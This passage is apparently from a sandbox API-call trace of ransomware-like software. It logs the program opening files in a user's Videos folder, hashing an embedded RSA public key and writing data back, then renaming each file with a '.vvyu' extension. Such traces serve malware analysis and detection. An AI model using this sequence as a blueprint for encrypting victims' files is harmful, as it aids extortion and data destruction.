Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0194.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0194.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0194.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42388 | out: hHeap=0x6a0000) returned 1 [0194.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.338] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xa9c4, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xa9c4, lpOverlapped=0x0) returned 1 [0194.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.339] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa9c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.339] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0194.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0194.340] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.341] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.341] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.341] CloseHandle (hObject=0x584) returned 1 [0194.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0194.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0194.343] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\tU0g8BChMTWFHiHtpj.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\tu0g8bchmtwfhihtpj.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\tU0g8BChMTWFHiHtpj.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\tu0g8bchmtwfhihtpj.swf.vvyu")) returned 1 [0194.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.344] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0194.347] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57aa25e0, ftCreationTime.dwHighDateTime=0x1d89b05, ftLastAccessTime.dwLowDateTime=0xa439d130, ftLastAccessTime.dwHighDateTime=0x1d8a532, ftLastWriteTime.dwLowDateTime=0xa439d130, ftLastWriteTime.dwHighDateTime=0x1d8a532, nFileSizeHigh=0x0, nFileSizeLow=0xfda0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VNAR2BEit3ka1sGXw8sq.mp4", cAlternateFileName="VNAR2B~1.MP4")) returned 1 [0194.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0194.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0194.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.347] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\VNAR2BEit3ka1sGXw8sq.mp4") returned=".mp4" [0194.347] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\VNAR2BEit3ka1sGXw8sq.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\vnar2beit3ka1sgxw8sq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.348] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=64928) returned 1 [0194.348] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.351] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfd7a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.351] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.355] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.355] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xfda0, lpOverlapped=0x0) returned 1 [0194.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.356] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaab8) returned 1 [0194.358] CryptCreateHash (in: hProv=0x6eaab8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.358] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.358] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.358] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.358] GetLastError () returned 0x0 [0194.358] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0194.358] CryptReleaseContext (hProv=0x6eaab8, dwFlags=0x0) returned 1 [0194.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.358] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.358] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.358] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfda0) returned 0x2d49778 [0194.359] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42388 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d423d0 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.360] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a018 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0194.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.363] GetCurrentThreadId () returned 0x264 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46360 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.364] GetCurrentThreadId () returned 0x264 [0194.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.365] HeapFree (in: 